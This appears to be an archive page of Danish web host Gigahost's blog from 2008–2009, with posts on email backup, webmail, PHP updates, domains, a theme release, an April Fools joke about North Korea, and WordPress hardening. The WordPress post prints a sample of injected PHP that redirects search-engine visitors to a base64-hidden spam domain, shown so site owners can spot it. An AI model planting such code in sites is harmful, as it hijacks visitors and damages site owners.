Sådan tager du backup af dine emails

January 21st, 2009 | Tags: , | 8

backup Selvom Gigahost automatisk tager backup af emails, bruges denne backup kun i tilfælde af hardwarenedbrud og lignende situationer. Vi har derfor lavet en guide til hvordan du selv kan tage backup af dine emails, i tilfælde af fx systemnedbrud på din computer.

Outlook Express

For at tage backup af mail-filer i Outlook Express skal du kigge efter følgende mapper i dit system:

C:\Documents and Settings\User Name\Application Data\Identities\
C:\Documents and Settings\User Name\Application Data\Microsoft\Outlook Express\
C:\Documents and Settings\All Users\Application Data\Microsoft\Outlook Express\

Adressebogen finder du som regel i følgende mappe:

C:\Documents and Settings\User Name\Application Data\Microsoft\Address Book\

Disse mapper kan du blot tage en kopi af og gemme et andet sted.

Mozilla Thunderbird

Mozilla Thunderbird gemmer alle mails, din adressebog, bookmarks og andet, i “Profile”-mappen, som du finder her (hvis du bruger Windows):

C:\Documents and Settings\User Name\Application Data\Thunderbird\Profiles\

Alternativt kan du bruge et gratis program, MozBackup, der nemt tager backup (og gendanner) dine mails, adressebog, Firefox bookmarks og meget andet.

Apple Mail

I Apple Mail kan du bruge et gratis program, Email Backup 2.0, der kan tage backup (og gendanne) af både Apple Mail og Thunderbird til OS X. Alternativt kan du tage en kopi af filerne i:

~/Library/Mail

Det vil sige mappen “Mail” der ligger i biblioteket inde i ens egen brugers mappe.

Det er bedst at gemme filerne et andet sted end på din computer, fx brænde dem på en CD/DVD eller overføre til et USB-flashdrev. Skulle du være bekymret for sikkerheden, kan du altid kryptere filerne med fx TrueCrypt (et gratis program til kryptering af filer).

Ny webmail i betaversion

January 5th, 2009 | Tags: | 28

webmail1Efter en del arbejde på at vælge en ny løsning til vores webmail, har vi nu frigivet en betaversion til alle vores kunder. Den nye webmail findes på webmail.gigahost.dk.

Den nye webmail er betydelig hurtigere og mere moderne. Der er flere nye features som fx forskellige identiteter og en meget bedre søgefunktion. Der er lagt stor vægt på at give en klar, overskuelig og brugervenlig oplevelse.

Webmailen er baseret på RoundCube webmail, og benytter en række modificeringer udviklet af University of Michigan. Forslag og kommentarer modtages med glæde.

PHP opdateret til version 5.2.8

December 15th, 2008 | Tags: , | 11

Vi har i nat opdateret webserverne, så de benytter PHP version 5.2.8. Flere end 170 fejl er rettet siden version 5.2.6.

En fuld liste over ændringer kan ses på php.net.

Nye domænetyper håndteres nu

July 28th, 2008 | | 9

Gigahost kan nu registrere og overføre følgende nye typer domæner:

.ag, .asia, .bz, .cn, .hn, .lc, .me, .mobi

Som et tidsbegrænset tilbud koster et .cn-domæne kun 15 kr. inkl. moms! Øvrige priser for registrering og forlængelse af domæner kan findes i kontrolcenteret.

Opdatering juni 2010: Vi kan ikke længere registrere .cn-domæner da kravene for at registrere dem er blevet for strenge.

Sikkerhedsfejl i WordPress fører til mange hackede blogs

June 14th, 2008 | Tags: , , , | 10

Eftersom WordPress bliver mere og mere populært, er blogs drevet af WP mere og mere udsatte for hacker angreb og forsøg på at “hijacke” blogs. Den seneste stykke tid er en lang række blogs blevet overtaget af spammere og hackere, der ikke “overtager” bloggen helt, men lægger skjult kode ind, back-doors, annoncer og specielt links til spam sider.

Selvom WordPress er et af de mest sikre blogging platforme, bliver nye sikkerhedshuller hele tiden fundet (og lappet hurtigst muligt). Husk derfor at altid opdatere med den nyeste version af WordPress.

Hvis du ikke har den seneste udgave af WordPress, 2.5.1, er der stor sandsynlighed for at din side er hacket, selvom alt virker som det skal. Det sker ofte at der er lagt en backdoor ind, så hackeren har adgang til din blog, samt din adgangskode også kendes af hackeren. Vi anbefaler at du:

  • Opgraderer WordPress med det samme
  • Opdaterer din adgangskode

Kig efter skjult kode

Tjek derefter grundigt alle filer i det WordPress tema du bruger, da disse ikke bliver opgraderet. Det er som regel her at skjult kode bliver lagt ind, hovedsageligt med kommandoerne eval() og base64_decode(). Kig efter kode der ser sådan ud, som regel i din header.php:

< ?php $seref=array("google","msn","live","altavista","ask","yahoo","aol",
"cnn","weather","alexa");

$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false)
{ $ser="1"; break; }

if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }? >

Hackere bruger kode som denne (mere kode her) for at lægge skjulte links ind på din side, der ikke kan ses af dem der besøger siden, men kun af søgemaskinerne. Tjek derfor alle filer for kode og specielt links der ikke burde være der.

Tjek din htaccess

Der er også fundet eksempler på at hackere bruger .htaccess til at få adgang til WP-Admin. Åbn din .htaccess fil, som ligger i din WordPress folder. Hvis der ikke er ændret noget, skal den se sådan ud:

# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [ L]
# END WordPress

Denne kode kan også være der:
< ifmodule mod_security.c>
< files async-upload.php>
SecFilterEngine Off
SecFilterScanPOST Off
< /files>
< /ifmodule>

Hvis der er anden kode end det du har tilføjet det, er det bedst at du opdaterer alle dine WordPress filer (inklusive .htaccess, selvfølgeligt).

Fjern WP version fra meta tags

WordPress blogs bliver automatisk scannet af hackere efter version, på den måde er det nemmere at finde, og hacke, gamle blogs. WordPress bruger en meta tag til at vise hvilken version det er, der ser sådan ud:

< meta content="WordPress <?php bloginfo(’version’); ? />" name="generator" />

Du kan med fordel fjerne denne kode fra din header.php.

Flere tips

  • Begræns adgang til din wp-admin folder med .htacces, læs hvordan her.
  • Læg en tom index.html fil i din plugins folder, for at skjule hvilke plugins du bruger. Alternativ kan du bruge en index.php fil der viderestiller til din blog, læg < ?php header("Location: http://www.ditdomæne.dk");?> i en index.php fil og upload den.
  • Brug plugins som WP Security Scan for at teste sikkerheden.
  • Og til sidst, brug altid den seneste WordPress version, brug sikre adgangskoder, og husk altid at tage backup

Til sidst kan du læse om blogs der er blevet udsat for hacking, og deres erfaringer. Læs her, her, her, og her.

Indbydelse til information om udbuddet af .dk-domænet

May 26th, 2008 | | 0

I morgen, den 27. maj fra kl. 14:00, vil brancheforeningen for leverandører af domænenavne i Danmark, DKRegistrar, holde et offentligt informationsmøde om udbuddet af .dk-domænet.

Gigahost deltager aktivt som medlem af bestyrelsen i DKRegistrar med det formål at skabe bedre vilkår for vores kunder i forbindelse med domæner. Vi vil derfor gerne indbyde alle interesserede til at møde op på følgende adresse:

Salen – Valby Kulturhus
Valgårdsvej 4
2500 Valby

PHP 5.2.6 er udgivet

May 3rd, 2008 | Tags: , | 14

Holdet bag scriptsproget PHP har udgivet version 5.2.6 af PHP. I denne udgave er en række mindre fejl og sikkerhedsmæssige forhold blevet rettet. Hvis du har valgt at benytte PHP 5 i kontrolcenteret, vil du automatisk benytte den nye version.

Sådan undgår du at blive hacket

April 8th, 2008 | Tags: , , | 11

Et par Gigahost kunder har i de sidste par dage oplevet at deres sider er blevet hacket, i de fleste tilfælde af “Muslem Hacker” eller “Saudi Arabian hacker”. På grund af visse tegninger er danske websider mere udsatte i disse dage. Her er et par sikkerhedstips til din side.

  • Adgangskoder: Husk altid at have ordentlige adgangskoder til dine systemer, og brug aldrig dit brugernavn eller navn som adgangskode til dit webhotel, mail osv. Alternativt kan du bruge password-generatorer som fx denne her.
  • CMS og scripts: Opdater altid dit CMS og scripts til de nyeste versioner, da nye sikkerhedshuller findes (og lappes) regelmæssigt.
  • Slet unødvendige filer: Slet filer og scripts du ikke bruger, specielt installationsfiler fra CMS-installationer, der som regel hedder “install.php” eller “setup.php”.
  • Brug robots.txt: Søgemaskiner indekserer normalt al indhold på din side, men ved at placere en robots.txt fil kan du specificere hvad der skal indekseres, og hvad der ikke skal. Læs hvordan du gør her.
  • Beskyt med .htaccess: Du kan bruge .htaccess til at password-beskytte visse dele af din side, blokere adgang fra visse IP-adresser, blokere for hot-linking af billeder og meget andet. Læs mere her, og en WordPress-specifik .htaccess guide kan findes her.
  • Plugins og tredjepartsprogrammer: Hvis du bruger 3. parts plugins eller scripts til dit CMS, fx WordPress plugins, er det altid en god ide at opdatere til de nyeste versioner. Husk også kun at downloade plugins og scripts fra officielle kilder.
  • Brug antivirus/antispyware: Brug antivirus og antispyware programmer til at beskytte din PC, da dine adgangskoder nemt kan tilgås via spyware programmer. Et godt og gratis antivirus program er AVG, og mod spyware, og ligeledes gratis, anbefaler vi Ad-Aware.
  • Backup: Til sidst skal du altid huske at tage backup af dine filer og database – specielt når du opdaterer dit CMS eller dine scripts.

Gigahost lancerer Gigahost NK

April 1st, 2008 | Tags: | 13

I samarbejde med ledelsen i Nordkorea, har Gigahost lanceret det første webhotel i landet, kaldet Gigahost NK. Gigahost vil tilbyde alle Nordkoreanere mulighed for webhosting — udvalgte borgere kan allerede nu ansøge om et webhotel.

Samtidig flytter Gigahost til et topsikret datacenter i udkanten af Pyongyang, bevogtet af bevæbnede vagter fra landets fjerde arme. Ud over en høj sikkerhed, så får Gigahost også ubegrænset adgang til strøm fra den nye atomreaktor.

Nordkoreas leder, Kim Jong-il, der siges at have opfundet selve princippet med webhoteller, er meget optimistisk over det nye initiativ fra Gigahost. Han siger til KCTV:

Gan jin sho ha, han too sia ban. San jii Gigahost NK, ke pun mei! Tan po ne, sam yan, pen tak to han-song shai!

Gigahost har på nuværende tidspunkt ikke fået en oversættelse fra Nordkoreas informationsministerium, men er sikre på at ordene fra den store leder er inspirerende og opløftende, som altid.

Gigahost NK vil efter planen blive taget i brug sidst i 2008. I begyndelsen vil der være en begrænsning på et .kp domæne per kunde, dog håber Gigahost at kunne bryde denne totalitære trend i starten af 2010, i Nordkorea.

Gigahost WordPress Tema

March 19th, 2008 | Tags: , , , | 8

screenshot.pngHos Gigahost bruger vi WordPress ikke kun til vores blog, men også som CMS til vores supportsektion.

Vi er derfor stolte af at præsentere Gigahost WordPress Blogtema — der udgives gratis under open source GPL-licensen. Temaet er kompatibelt med den nyeste WordPress-udgave (2.3.3).

For at bruge det nye tema, upload mappen “ghtheme” til “themes” folderen i din WordPress installation (wp-content/themes/), gå derefter ind under “Presentation” og aktiver dit nye tema.

Download Gigahost Blog Theme – v1.0

Vi hilser alle kommentarer og forslag velkomne.

« Forrige side
Næste side »